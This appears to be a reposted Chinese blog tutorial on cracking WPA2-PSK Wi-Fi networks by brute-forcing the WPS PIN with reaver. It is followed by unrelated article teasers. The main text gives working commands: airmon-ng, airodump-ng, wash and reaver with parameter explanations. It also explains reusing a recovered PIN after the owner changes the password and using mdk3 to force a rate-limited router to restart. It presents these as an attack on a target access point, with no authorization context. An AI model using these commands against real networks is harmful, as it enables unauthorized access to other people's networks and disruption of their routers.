使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

全栈程序员-站长 • 2022年6月4日上午9:46 • 未分类 • 阅读 30

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]【前言】现在的路由器大多都默认用WPA2-PSK方式对无线网络进行加密了，不能再像WEP加密方式那样好破解，使用字典又需要费心费力地整理字典，而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供WPS功能，通过这个功能，用户可以使用PIN码登录到路由器。但这个PIN码的长度只有8位，而且可能的取值只有11000种（注意，不是10…

大家好，又见面了，我是你们的朋友全栈君。

【前言】

现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了，不能再像 WEP 加密方式那样好破解，使用字典又需要费心费力地整理字典，而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能，通过这个功能，用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位，而且可能的取值只有11000种（注意，不是 10^8 种）。所以我们可以进行简单粗暴的穷举 PIN 码破解，而且我们可以推断出这种破解方法在目标 AP 开启了 WPS 功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了，但至今依然奏效。

【操作步骤】

1、切换无线网卡到监听模式：
airmon-ng start wlan0

2、刺探附近 WLAN 网络（这个命令所跟的参数值可以在步骤1 完成后从提示信息中查看到）：
airodump-ng wlan0mon

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

3、找出开启了 WPS 功能、可以使用 PIN码登录的路由器，并另外记录下该 AP 的 BSSID（约等于该 AP 的 MAC 地址）：
wash -i wlan0mon

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

3、开始进行 PIN码穷举破解（注意末尾的参数是 2 个小写字母 v）：
reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

参数说明：
-i 无线网卡名称
-b 目标AP的mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key，可以提高破解速度
-vv 显示更多的非严重警告（注意这是 2 个小写字母 v）
-d 即delay每穷举一次的闲置时间预设为1秒
-c 信道编号
-p PIN码四位或八位 //可以用8位直接找到密码。

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

4、等待破解完成（这个破解可能会时间比较长，和你的目标 AP 有关，我当时花费了 12 个小时才破解出来），这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度信息：

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

破解完成后，查看并记录下 PIN码和密码：

使用reaver命令穷举PIN码破解WPA2-PSK加密的无线网络[通俗易懂]

5、获取到 PIN码后，以后即便路由器更换了密码，我们也可以很迅速地通过 PIN码重新获得新密码。以上方获取到的信息举例：

reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -p 12316977

【注意事项】

1、如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息，那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。

2、如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息，这表示目标路由器开启了防 PIN破解功能。因为我们是穷举 PIN码进行破解的，当连续使用超过某个次数的 PIN码后，路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能，要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx （这是上面的目标AP的MAC地址）命令让路由器主动重启或被动重启以恢复 WPS 功能。

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请联系我们举报，一经查实，本站将立刻删除。

发布者：全栈程序员-站长，转载请注明出处：https://javaforall.net/136049.html原文链接：https://javaforall.net

赞 (0)

全栈程序员-站长

0 0

C / C++ 读取文件出现乱码解决方法 | 输出到文件出现乱码

C / C++ 读取文件出现乱码解决方法 | 输出到文件出现乱码　　昨天用C语言写了一下文件读取，发现读出来的全是乱码。这肯定是文字编码不同导致的。　　　　据我查证，C语言的汉字编码方式是由你电脑决定的，所以需要看一下你电脑是什么编码，来确定你需要把文本文件改成什么编码。1.win+R，打开运行框之后输入cmd打开，然后在cmd最上边右键→属性，点开就可以查看当前编码方式，我的电脑是GBK。2.然后修改对应的文本文件编码方式。…

全栈程序员-站长
2022年7月26日
60
在Sqlite中实现RowNumber功能[通俗易懂]

在Sqlite中实现RowNumber功能[通俗易懂]SELECT ROWID, (SELECTCOUNT(1)FROM`Weight`bWHEREa.`Date`>=b.`Date`)AS`ROWNUMBER`, a.*FROM `Weight`aORDERBY a.`Date`SELECT ROWID, (SELECTCOUNT(1)FROM`Weight`bW…

全栈程序员-站长
2022年6月1日
71
紫橙绿蓝的jQuery幻灯片切换

效果展示 http://hovertree.com/texiao/jquery/77/看惯了左右切换的幻灯片，何问起向您推荐一个新颖的，旋转切换，通过点击按钮的相应区域可以使幻灯片以旋转的方

全栈程序员-站长
2021年12月27日
41
java反射机制的作用是什么_java的反射机制是什么

java反射机制的作用是什么_java的反射机制是什么运行时类型识别(Run-timeTypeIdentification,RTTI)主要有两种方式，一种是我们在编译时和运行时已经知道了所有的类型，另外一种是功能强大的“反射”机制。要理解RTTI在Java中的工作原理，首先必须知道类型信息在运行时是如何表示的，这项工作是由“Class对象”完成的，它包含了与类有关的信息。类是程序的重要组成部分，每个类都有一个Class对象，每当编写并编译了一个…

全栈程序员-站长
2022年8月24日
7
计算机网络ip地址划分范围,ip地址分类及范围划分有哪些

计算机网络ip地址划分范围,ip地址分类及范围划分有哪些ip地址分为网络地址和主机地址，IP地址是真正网络中计算机的身份标识。手机的IP是手机上网使用的地址，不论是手机还是电脑，一个网段里面只有一个IP，所以每个人手机的IP都是唯一的，当用手机发朋友圈时，就会显示手机ip地址所在地，因此有些人会想要修改手机ip地址。那么ip地址可分为哪几类？其范围是怎么划分的？如何修改手机ip地址？下面小编为大家解答手机ip地址修改方法及ip地址分类及范围划分等知识。…

全栈程序员-站长
2022年5月29日
47
heap&stack 区别

heap&stack 区别1 heap 是堆 stack 是栈 2 stack 的空间由操作系统自动分配和释放 heap 的空间是手动申请和释放的 heap 常用 new 关键字来分配 3 stack 空间有限 heap 的空间是很大的自由区在 Java 中若只是声明一个对象则先在栈内存中为其分配地址空间若再 new 一下实例化它则在堆内存中为其分配地址 4 举例数据类型变量名这样定义的东西在栈区

全栈程序员-站长
2025年6月20日
4

发表回复

关注全栈程序员社区公众号